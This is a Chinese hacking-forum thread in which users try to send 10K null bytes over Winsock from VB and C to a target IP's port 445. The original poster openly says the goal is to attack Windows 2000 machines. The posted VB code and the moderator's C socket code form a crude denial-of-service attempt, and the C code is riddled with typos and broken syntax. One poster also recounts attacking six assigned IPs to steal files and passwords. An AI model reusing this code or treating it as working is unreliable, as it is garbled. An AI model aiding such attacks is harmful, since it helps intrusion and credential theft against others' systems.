|
 | 作者: group [group]
 论坛用户 |
登录 |
| 源码 ..... For i = 1 To 10000 strCommand = strCommand & "." i = i + 1 Next i Winsock1.SendData strCommand .... 16进制空字节是00,转成ASCII是"." 我想发送10K空字节,于是我写了10000个点,虽然比较荒谬,试了总是好的 结果失败 怎么发?大家帮忙 |
| 地主 发表时间: 05/17 03:58 |
 | 回复: ricky [ricky]  版主 |
登录 |
|
我建议你调用api,处理二进制更方便一点,我涉及到这方面都用c写的dll,在VB调用 |
| B1层 发表时间: 05/17 11:16 |
| 回复: group [group] 论坛用户 |
登录 |
|
Private Sub Command1_Click() Dim ip As String ip = Text1.Text Winsock1.RemoteHost = ip Winsock1.Connect On Error Resume Next Dim i As Integer Dim strCommand As String strCommand = "" For i = 1 To 10000 strCommand = strCommand & Chr(0) i = i + 1 Next i 'Text1.Text = strCommand Command1.Enabled = False Winsock1.SendData strCommand Winsock1.Close Command1.Enabled = True End Sub 有什么错? |
| B2层 发表时间: 05/17 15:48 |
| 回复: davy [davy]  论坛用户 |
登录 |
|
winsock1.remoteport=445 |
| B3层 发表时间: 05/17 17:21 |
| 回复: group [group] 论坛用户 |
登录 |
|
这个在winsock的属性里面已经写好了啊 |
| B4层 发表时间: 05/17 23:42 |
| 回复: davy [davy] 论坛用户 |
登录 |
|
周五我也试了一下,我先运行一个程序,指定一个端口监听。在另一台机器上运行这个程序来连接,已经可以完成连接,可能需要指定LOCALPORT,下一步开始发送数据。 然后就是试试445端口。 |
| B5层 发表时间: 05/18 17:00 |
 | 回复: cimsxiyang [cimsxiyang] 版主 |
登录 |
|
-----------------server.c-------------------------- /*server will read the data from the socket,and return a character to the client each time.*/ #include <sys/socket.h> #include <netinet.h> int main() { int listenfd,connfd; struct_in addr; char buf[200]; int n,i; listenfd=socket(AF_INET,SOCK_STREAM,0); addr.sin_family=AF_INET; addr.sin_port=htins(80); addr.sin_addr.s_addr=htonl(INADDR_ANNY); bind(listenfd,struct sockaddr *)&addr,sizeof(addr)); listen(listenfd,1); for(;;) { connfd=accept(listenfd,NULL,NULL); while(1){ n=read(connfd,buf,sizeof(buf)); if(n==0) break; else if (n<0&error==EINTR) continue; else { printf(stderr,"error: %s\n",strerror(error)); break; } for (i=0;i<n;i++) write(connfd;&buf[i],1); sleep(1); } } close(connfd); } } -------------------------------client.c-------------------------- #include <sys/socket.h> ............ main(int argc,char * argv[]) int sockfd; struct sockaddr_in servaddr; char inch ,outbuf[100]; fd_set rdset; int n; int i; for (i=0;i<100,i++) { outbuf[i]=""; } if (argc!=2){ perror("error!\n"); exit(1); } sockfd=socket(AF_INET,SOCK_STREAM,0); if (sockfd<0) { perror("error\n"); exit(1); } bzero(&seraddr,sizeof(servaddr)); servaddr.sin_family=AF_INET; servaddf.sin_port=htons(80); if (inet_aton(argv[1],&servaddr.sin_addr)<0) { perror("error\n"); exit(1); } if (connect(sockfd,(struct sockaddr*)&servaddr,sizeof(servaddr))<0){ perror("error\n"); exit(1); } to.tv_sec=30; to.tv.usec=0; for(;;) { FD_ZERO(&rdset); FD_SET(0,&rdset); n=selsect(sockfd+1,&rdset,NULL,NULL,&to); if(n==0) { fprintf(stderr,"time out"); break; } else if (n<0&&errno==EINTR) continue; else if (n<0) { fprintf(stderr,"select return -1. \n"); exit(1); if (FD_ISSET(0,&rdset)){ gets(outbuf); write(sockfd,outbuff,strlen(oubuf)); } if(FD_ISSET(sockfd,&rdset)) { switch (read(sockfd,&inch,1)) { case 0: fprintf(stderr,"EOF"); exit(0); case -1 fprintf(stderr,"read error"); exit(1); default: write(1,&inch,1); } } } } /*兰MM,高烧把我的头烧得象个萝卜似的,你看看这个对你有没有帮助。我回去睡觉了,刚才睡不着,又到办公室来上网。:)*/ |
| B6层 发表时间: 05/22 23:53 |
 | 回复: NetDemon [netdemon]  ADMIN |
登录 |
|
不好意思,ASCII的"."的16进制明明是2E 而16进制的00也决不会是"." 你一开始就错得太荒唐了 |
| B7层 发表时间: 05/23 13:46 |
 | 回复: tntnetfans [tntnetfans] 论坛用户 |
登录 |
|
是不是想攻击445端口? |
| B8层 发表时间: 05/23 15:37 |
| 回复: group [group] 论坛用户 |
登录 |
|
我知道错了还努力试试,这就叫敬业,你个NetDemon回答问题的时候看不见你,现在来这里唧唧歪歪。 |
| B9层 发表时间: 05/24 13:56 |
| 回复: cimsxiyang [cimsxiyang] 版主 |
登录 |
|
呵呵 |
| B10层 发表时间: 05/24 15:01 |
| 回复: group [group] 论坛用户 |
登录 |
|
夕阳确定是这样生成10K空字节? for (i=0;i<100,i++) { outbuf[i]=""; } |
| B11层 发表时间: 05/24 16:41 |
| 回复: davy [davy] 论坛用户 |
登录 |
|
高手终于献身了 前两天有人给了6个IP让攻击,都是win2k sp2或nt4 sp6,目标是取得一个文件和用户名密码,终于还是只取得了普通用户的用户名密码,没法进一步.学艺不精啊,以后还请各位多指教. |
| B12层 发表时间: 05/25 17:42 |
| 回复: group [group] 论坛用户 |
登录 |
|
安全配好,绝对正常 |
| B13层 发表时间: 05/26 02:31 |
| 回复: zzzz [zzzz]  论坛用户 |
登录 |
|
不知的用VB发送空字节到指定端口成功了没,我也觉你是想攻击win2k 445端口。如果成功了,能否给我发一个,我看看效果,可以吗。我也曾试过 dim str as string* 1024*10 winsock.senddata str 不知不知可不可以,我看不出效果,请指教! |
| B14层 发表时间: 05/26 10:51 |
| 回复: group [group] 论坛用户 |
登录 |
|
本来就是要攻击这个端口的,夕阳拿了C的出来我就没写VB的了,因为我的问题从怎么发送变成了怎么描述10K的空字节,我问夕阳的他还没回答呢:( |
| B15层 发表时间: 05/27 17:02 |
| 回复: cimsxiyang [cimsxiyang] 版主 |
登录 |
|
我觉得可以用:循环的方法把10k空字节放到一个buff[]中,然后,write() 你可以先试试。 我有空就调试。 :) |
| B16层 发表时间: 05/27 19:23 |
| 回复: zzzz [zzzz] 论坛用户 |
登录 |
|
晓澜 ,你把程序写出来,可别忘了给我发一份(原代码+程序),可以吗。 我的信箱是:hac01@163.com [此贴被 天地无用(zzzz) 在 5月30日8时11分 编辑过] |
| B17层 发表时间: 5/30 8:3 |
| 回复: group [group] 论坛用户 |
登录 |
|
什么是空字节? |
| B18层 发表时间: 05/28 21:09 |
 | 回复: LostAngel [lostangel] 论坛用户 |
登录 |
|
为什么是445端口啊? |
| B19层 发表时间: 07/04 20:21 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 编程破解
标题: 如何用VB发送空字节到指定端口